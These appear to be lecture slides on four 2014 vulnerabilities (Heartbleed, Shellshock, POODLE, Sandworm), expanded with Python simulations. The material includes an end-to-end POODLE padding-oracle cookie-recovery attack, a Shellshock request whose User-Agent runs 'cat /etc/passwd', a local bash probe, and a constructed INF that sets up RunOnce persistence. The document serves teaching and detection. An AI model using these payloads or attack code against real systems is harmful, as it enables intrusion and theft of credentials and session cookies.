Name Generator(s)
Miroslav Štampar
(mstampar@zsis.hr)
Introduction
Heartbleed (1)
CVE-2014-0160 (5.0)
Discovered independently by Neel Mehta (Google) and Codenomicon at roughly the same time (the bug had been in OpenSSL since 1.0.1, released in March 2012)
Public disclosure on April 7, 2014
Buffer over-read in OpenSSL's (1.0.1 before 1.0.1g) implementation of the TLS heartbeat extension (RFC 6520)
Allows attackers to read up to 64KB of server (or client) memory per heartbeat, including private cryptographic keys and private user data
It is estimated that 24-55% of HTTPS servers in the Alexa Top 1 Million were initially vulnerable
FER 2015, Zagreb (Croatia)
Heartbleed (2)
The heartbeat extension provides a means to test and keep alive a secure connection without renegotiating it
A Heartbeat Request carries a payload (typically a short text value), and the receiver has to send exactly the same payload back to the sender
The size of the returned payload is taken from the 16-bit payload_length field of the request (so up to 64KB in an attack), which vulnerable OpenSSL never checked against the actual length of the received payload (e.g. the 6 bytes of foobar)
Heartbleed (3)
The response therefore consists of the payload followed by whatever else happened to sit after it in memory (in case of a faked payload length)
The attack is repeated in the hope of reading chunks previously used by OpenSSL (e.g. the server's private key, session cookies, credentials, etc.)
OpenSSL's custom memory allocator (a freelist of recycled buffers that bypasses the system malloc and any hardening it offers) makes exploitation far easier: freed chunks that held previous requests and key material are reused in a predictable way next to the received record
Lots of criticism followed, especially of OpenSSL's sloppy coding style (e.g. the LibreSSL developers removed around 90,000 lines of code from the OpenSSL source tree within a week of forking)
Heartbleed (4)
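The over-read described on the previous slides, as an added example (it is not the deck's heartbleed.py nor OpenSSL code): the RFC 6520 heartbeat message layout, a handler that behaves like OpenSSL 1.0.1 through 1.0.1f, and the bounds check that 1.0.1g added. The "heap" is a bytes object standing in for the process memory that happens to follow the received record, and its leftover contents are constructed; the 0x4000 claimed length is just a sample attack value.

```python
"""Heartbleed (CVE-2014-0160) modelled in Python: the RFC 6520 heartbeat
message, the over-read in OpenSSL 1.0.1 through 1.0.1f, and the bounds check
1.0.1g added. Added example, not the slides' heartbleed.py; the "heap" stands
in for the process memory that follows the received record, and the leftover
data placed after it is constructed."""
import struct

HB_REQUEST, HB_RESPONSE = 1, 2
PADDING = 16        # RFC 6520: at least 16 bytes of random padding


def build_heartbeat(payload, claimed_length):
    """HeartbeatMessage: type(1) | payload_length(2) | payload | padding.
    An honest peer passes claimed_length == len(payload); the attack lies."""
    return struct.pack("!BH", HB_REQUEST, claimed_length) + payload + b"\x00" * PADDING


def tls_record(body, version=(3, 2)):
    """Wrap the message in a TLS record: content type 24 (heartbeat), version, length."""
    return struct.pack("!BBBH", 24, version[0], version[1], len(body)) + body


def vulnerable_handler(heap, offset, record_len):
    """OpenSSL <= 1.0.1f tls1_process_heartbeat(): trusts payload_length and
    memcpy()s that many bytes starting at the payload, running past the record."""
    hb_type, payload_length = struct.unpack_from("!BH", heap, offset)
    if hb_type != HB_REQUEST:
        return None
    start = offset + 3
    echoed = heap[start:start + payload_length]          # over-read happens here
    return struct.pack("!BH", HB_RESPONSE, payload_length) + echoed + b"\x00" * PADDING


def fixed_handler(heap, offset, record_len):
    """OpenSSL 1.0.1g: silently discard a message whose header, claimed payload
    and minimum padding do not fit inside the received record."""
    if record_len < 1 + 2 + PADDING:
        return None
    _, payload_length = struct.unpack_from("!BH", heap, offset)
    if 1 + 2 + payload_length + PADDING > record_len:
        return None
    return vulnerable_handler(heap, offset, record_len)   # safe once the check passed


def simulate(handler, payload=b"foobar", claimed_length=0x4000):
    """Place the received message in a fake heap right before data left over
    from earlier requests, then let the handler respond."""
    leftover = b"Cookie: session=3f9a...; -----BEGIN RSA PRIVATE KEY-----"   # constructed
    message = build_heartbeat(payload, claimed_length)
    heap = bytes(32) + message + leftover + bytes(64)
    return handler(heap, 32, len(message))


def echoed_payload(response):
    """The payload bytes the requester gets back (None response = dropped)."""
    if response is None:
        return b""
    _, n = struct.unpack_from("!BH", response, 0)
    return response[3:3 + n]
```

With the default arguments `simulate(vulnerable_handler)` returns the planted private-key fragment inside the echoed payload, while `simulate(fixed_handler)` returns None; both handlers echo an honest `foobar` request (claimed length 6) unchanged.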
Heartbleed (5)
python heartbleed.py www.target.com
Shellshock (1)
CVE-2014-6271 (10.0), CVE-2014-6277 (10.0), CVE-2014-6278 (10.0), CVE-2014-7169 (10.0), CVE-2014-7186 (10.0) and CVE-2014-7187 (10.0)
Discovered by Stéphane Chazelas
Public disclosure on September 24, 2014
Remote code execution through Bash
Many Unix-like (Linux, *BSD, macOS) Internet-facing systems expose Bash to client-supplied data (e.g. HTTP via CGI, DHCP client hooks, SSH ForceCommand, CUPS filters, etc.)
Bash supports exporting not just shell variables but also shell functions to child Bash instances, encoded as environment variables whose value starts with "() {"
The bug: when importing such a function, a vulnerable Bash kept parsing and executing whatever followed the function body, so anyone who controls an environment variable gets command execution
Shellshock (2)
Sample function definition in Bash:
Shellshock (3)
HTTP requests to CGI scripts have been identified as the major attack vector
The CGI specification maps parts of the request to environment variables (e.g. the User-Agent header becomes $HTTP_USER_AGENT, the Host header $HTTP_HOST, the query string $QUERY_STRING)
CGI programs written in Perl, PHP, Python, Ruby and Bash itself are potentially vulnerable: Bash scripts directly, the others whenever they spawn a shell (system(), popen(), backticks) that inherits the environment
Sample vulnerable script:
Shellshock (4)
Sample attack:
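The CGI attack path of the last three slides, as an added example that is not the deck's sample script or attack: a builder that maps a request onto CGI variables the way a web server does, a detector for Shellshock-shaped header values (what an IDS or WAF rule looks for), and a harmless live probe of whichever bash is installed. Both HTTP requests, the hostname www.target.com and the hypothetical /cgi-bin/status script are constructed; the probe only echoes a marker and reports None when no bash is present.

```python
"""Shellshock (CVE-2014-6271) over CGI, modelled in Python as an added example
(not the slides' script): a CGI-style environment builder, a detector for
function-export payloads in request-derived variables, and a live probe of the
local bash. Both requests below are constructed."""
import os
import re
import shutil
import subprocess


def cgi_environ(request):
    """Map an HTTP request onto CGI meta-variables the way a web server does:
    request-line fields become REQUEST_METHOD/SCRIPT_NAME/QUERY_STRING and
    every header X-Y becomes HTTP_X_Y (so User-Agent ends up in HTTP_USER_AGENT)."""
    head, _, body = request.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    env = {"REQUEST_METHOD": method, "SCRIPT_NAME": path,
           "QUERY_STRING": query, "CONTENT_LENGTH": str(len(body))}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        env["HTTP_" + name.strip().upper().replace("-", "_")] = value.strip()
    return env


# A vulnerable bash treats any environment value starting with "() {" as a
# function definition and (the bug) keeps executing what follows the body.
PAYLOAD_RE = re.compile(r"^\s*\(\)\s*\{.*?\}\s*;\s*(.*)$", re.S)


def shellshock_payloads(env):
    """Return {variable: injected command} for every CGI variable carrying a
    Shellshock-shaped value; no legitimate HTTP header starts with '() {'."""
    hits = {}
    for name, value in env.items():
        m = PAYLOAD_RE.match(value)
        if m:
            hits[name] = m.group(1).strip()
    return hits


def run_cgi_under(env, script='echo "Content-Type: text/plain"; echo; echo hello'):
    """Run a minimal bash CGI script with the request-derived environment, as
    the web server would. Returns its stdout, or None when bash is not installed.
    On an unpatched bash the injected command runs before the script itself."""
    bash = shutil.which("bash")
    if bash is None:
        return None
    full_env = dict(os.environ, **env)
    return subprocess.run([bash, "-c", script], env=full_env,
                          capture_output=True, text=True).stdout


def bash_is_vulnerable():
    """Probe the local bash with a harmless payload (None if bash is absent)."""
    out = run_cgi_under({"HTTP_USER_AGENT": "() { :; }; echo vulnerable"}, "echo done")
    return None if out is None else "vulnerable" in out


# Constructed sample traffic: a normal request and the classic header payload.
BENIGN = ("GET /cgi-bin/status?verbose=1 HTTP/1.1\r\nHost: www.target.com\r\n"
          "User-Agent: Mozilla/5.0\r\n\r\n")
ATTACK = ("GET /cgi-bin/status HTTP/1.1\r\nHost: www.target.com\r\n"
          "User-Agent: () { :; }; /bin/cat /etc/passwd\r\n\r\n")
```

`shellshock_payloads(cgi_environ(ATTACK))` isolates the injected command from the User-Agent variable, the benign request yields nothing, and `bash_is_vulnerable()` is the same check as the well-known one-liner `env x='() { :;}; echo vulnerable' bash -c "echo done"`, only driven from Python.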
POODLE (1)
CVE-2014-3566 (4.3)
Discovered by Bodo Möller, Thai Duong and Krzysztof Kotowicz (@Google)
Public disclosure on October 14, 2014
Padding Oracle On Downgraded Legacy Encryption
Padding oracle attack against the CBC mode of operation in SSL 3.0 (same attacker model as BEAST, a MitM plus attacker-controlled requests from the victim's browser, but exploiting a different flaw: the padding bytes are never checked)
If the client supports TLS, the MitM first forces a version downgrade to SSL 3.0 by breaking the TLS handshakes
Major browsers (at the time) voluntarily retried with SSL 3.0 when TLS handshakes failed
POODLE (2)
SSL 3.0 (superseded by TLS 1.0 15 years earlier) uses CBC padding whose filler bytes are neither covered by the MAC nor checked on receipt, which makes padding oracle attacks possible for a MitM
Padding is appended to make the plaintext length a multiple of the cipher's block size (e.g. 8 bytes for 3DES and 16 bytes for AES)
SSL 3.0 padding consists of arbitrary filler bytes followed by a single byte giving the number of filler bytes (which must be less than the block size); only that last byte is verified
In a padding oracle attack the server leaks whether the padding of a tampered encrypted message is correct or not (by rejecting the record or accepting it)
POODLE (3)
POODLE (4)
The POODLE attack presumes that the victim runs malicious JavaScript in a browser, which makes attacker-controlled requests (with the cookies attached) to the origin of interest (e.g. google.com)
The attacker intercepts one such encrypted request, whose path and body lengths were chosen so that the cookie byte of interest is the last byte of some block and the final block consists of padding only
The attacker copies the ciphertext block holding that cookie byte over the last (padding) block and forwards the altered record to the server
If the server does not drop the altered request, the last byte of the decrypted copied block XORed with the last byte of the preceding ciphertext block must equal the padding length (block size - 1); the attacker knows the surrounding ciphertext bytes, so this reveals the cookie byte
The server accepts with probability 1/256 per attempt, so on average 256 requests (each freshly encrypted) are needed per byte; shifting the request by one byte then exposes the next cookie byte
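The attack from the POODLE slides carried out end to end, as an added example (not code from the slides or from the paper's authors). To run offline without a crypto library, the block cipher is a toy 4-round Feistel network over SHA-256 standing in for 3DES/AES (only the CBC structure and the padding check matter), each record carries an explicit random IV instead of SSL 3.0's chained IV, and the victim's browser is a function the attacker calls with a chosen path and body length. The key, the cookie value, the request layout and the seeded RNG are all constructed assumptions.

```python
"""POODLE (CVE-2014-3566) padding-oracle attack on SSL 3.0-style CBC,
simulated end to end. Added example, not code from the slides. The block
cipher is a toy Feistel network over SHA-256 (only the CBC structure matters),
records use an explicit random IV rather than SSL 3.0's chained IV, and the
victim's browser is a function the attacker calls with chosen lengths."""
import hashlib
import hmac
import random

BLOCK = 16                      # 16-byte blocks, as for AES
MAC_LEN = 20                    # SHA-1 MAC, as in SSL 3.0 cipher suites
KEY = b"toy-demo-key"           # constructed
COOKIE = b"s3cr3t"              # constructed secret the attacker is after
RNG = random.Random(2014)       # seeded so the run is reproducible


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(i, half):
    return hashlib.sha256(KEY + bytes([i]) + half).digest()[:8]


def block_encrypt(blk):
    l, r = blk[:8], blk[8:]
    for i in range(4):
        l, r = r, xor(l, _f(i, r))
    return l + r


def block_decrypt(blk):
    l, r = blk[:8], blk[8:]
    for i in reversed(range(4)):
        l, r = xor(r, _f(i, l)), l
    return l + r


def ssl3_seal(data):
    """MAC, then SSL 3.0 padding (arbitrary filler bytes, last byte = number of
    filler bytes, which must be < BLOCK), then CBC-encrypt. Returns IV || ciphertext."""
    body = data + hmac.new(KEY, data, "sha1").digest()
    pad_len = BLOCK - 1 - len(body) % BLOCK
    body += bytes(RNG.randrange(256) for _ in range(pad_len)) + bytes([pad_len])
    iv = bytes(RNG.randrange(256) for _ in range(BLOCK))
    out, prev = [], iv
    for i in range(0, len(body), BLOCK):
        prev = block_encrypt(xor(body[i:i + BLOCK], prev))
        out.append(prev)
    return iv + b"".join(out)


def ssl3_open(record):
    """The oracle: True iff the server accepts the record. SSL 3.0 validates
    only the final length byte and the MAC, never the filler bytes."""
    blocks = [record[i:i + BLOCK] for i in range(0, len(record), BLOCK)]
    plain = b"".join(xor(block_decrypt(c), p) for p, c in zip(blocks, blocks[1:]))
    pad_len = plain[-1]
    if pad_len >= BLOCK:
        return False
    body = plain[:len(plain) - pad_len - 1]
    data, mac = body[:-MAC_LEN], body[-MAC_LEN:]
    return hmac.compare_digest(mac, hmac.new(KEY, data, "sha1").digest())


HEAD, MID, TAIL = b"GET /", b" HTTP/1.1\r\nCookie: secret=", b"\r\n\r\n"


def victim_request(path_len, body_len):
    """What the attacker's JavaScript makes the browser send: the attacker
    picks the path and body lengths, the browser attaches the cookie."""
    return ssl3_seal(HEAD + b"A" * path_len + MID + COOKIE + TAIL + b"B" * body_len)


def recover_cookie(cookie_len, max_tries=100_000):
    """Recover the cookie one byte at a time, about 256 requests per byte."""
    recovered = bytearray()
    for k in range(cookie_len):
        # Shift the request so cookie byte k is the last byte of plaintext block i ...
        path_len = -(len(HEAD) + len(MID) + k + 1) % BLOCK
        i = (len(HEAD) + path_len + len(MID) + k) // BLOCK
        # ... and pad the body so data + MAC is block-aligned: the final block
        # is then pure padding and its decrypted filler is never checked.
        fixed = len(HEAD) + path_len + len(MID) + cookie_len + len(TAIL) + MAC_LEN
        body_len = -fixed % BLOCK
        for _ in range(max_tries):
            rec = victim_request(path_len, body_len)
            blocks = [rec[j:j + BLOCK] for j in range(0, len(rec), BLOCK)]
            # blocks[0] is the IV, so ciphertext block C_i is blocks[i + 1];
            # copy it over the last block and forward the record to the server.
            if ssl3_open(b"".join(blocks[:-1]) + blocks[i + 1]):
                # Accepted, so D(C_i)[15] ^ C_{n-2}[15] == BLOCK - 1, and the
                # plaintext byte is P_i[15] = D(C_i)[15] ^ C_{i-1}[15].
                recovered.append((BLOCK - 1) ^ blocks[-2][-1] ^ blocks[i][-1])
                break
        else:
            raise RuntimeError("oracle never accepted; check the block alignment")
    return bytes(recovered)
```

`recover_cookie(len(COOKIE))` returns the cookie after roughly 256 accepted-or-rejected records per byte; the only information the attacker uses is whether `ssl3_open` accepted, which in a real deployment is visible as the server continuing versus sending an alert and closing the connection.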
Sandworm (1)
CVE-2014-4114 (9.3)
Identified by iSIGHT Partners while investigating the cyber-espionage campaign of the same name (the Sandworm Team), which used it as a zero-day
Public disclosure on October 15, 2014
Microsoft Windows OLE arbitrary code execution (patched as MS14-060)
Windows Vista SP2, Windows 7/8/8.1, Windows Server 2008/2012 are known to be vulnerable
The problem lies in how the Object Packager 2 component (packager.dll) handles an INF file that contains malicious registry changes (e.g. a RunOnce entry pointing at an attacker-supplied executable)
An INF can't be loaded (and executed) directly from a document, but the embedded OLE object can reference it by a UNC path on a remote share, and the packager fetches and installs it, running the RunOnce entries
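The INF trick on the slide above, from the defender's side, as an added example that is not taken from the slides, iSIGHT or the Metasploit module: a minimal INF parser and a triage rule that follows [DefaultInstall] AddReg= to the sections it names and flags every registry write into a Run/RunOnce key, which is the signature of an INF whose "installation" is really persistence plus execution. SAMPLE_INF is constructed to resemble the published descriptions of the campaign's file, not a copy of it, and the file names in it are assumptions.

```python
"""Triage for the INF trick behind Sandworm (CVE-2014-4114), as an added
example (not from the slides, iSIGHT or Metasploit): a minimal INF parser and
a rule that flags AddReg entries reachable from [DefaultInstall] which write
under Run/RunOnce. SAMPLE_INF is constructed, not the campaign's file."""
import csv
import re

SAMPLE_INF = r"""
[Version]
Signature="$CHICAGO$"

[DefaultInstall]
RenFiles=RxRename
AddReg=RxStart

[DestinationDirs]
RxRename=1

[RxRename]
slide1.gif.exe,slide1.gif            ; rename the "image" to an executable

[RxStart]
HKLM,"Software\Microsoft\Windows\CurrentVersion\RunOnce","Install",,"%1%\slide1.gif.exe"
"""

AUTORUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once|Services)?$", re.I)


def parse_inf(text):
    """INF is INI-like: [Section] headers, one entry per line, ';' comments.
    Returns {section_name: [entry, ...]} with comments and blank lines removed."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def autorun_entries(text):
    """Return (registry key, value) for each AddReg line reached from
    [DefaultInstall] that writes under Run/RunOnce/RunServices."""
    sections = parse_inf(text)
    hits = []
    for entry in sections.get("DefaultInstall", []):
        directive, _, targets = entry.partition("=")
        if directive.strip().lower() != "addreg":
            continue
        for name in targets.split(","):
            for line in sections.get(name.strip(), []):
                # AddReg entry: reg-root,subkey,value-name,flags,value (fields may be quoted)
                fields = next(csv.reader([line]))
                if len(fields) >= 2 and AUTORUN_KEY.search(fields[1]):
                    value = fields[4] if len(fields) > 4 else ""
                    hits.append((fields[0] + "\\" + fields[1], value))
    return hits
```

On the constructed sample `autorun_entries` reports the single RunOnce write and the executable it launches; an ordinary driver or application INF whose DefaultInstall only copies files yields an empty list. The RenFiles section is parsed but not flagged, since the registry write is what turns the INF into a launcher.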
Sandworm (2)
msfconsole (ms14_060_sandworm)
Sandworm (3)
Questions?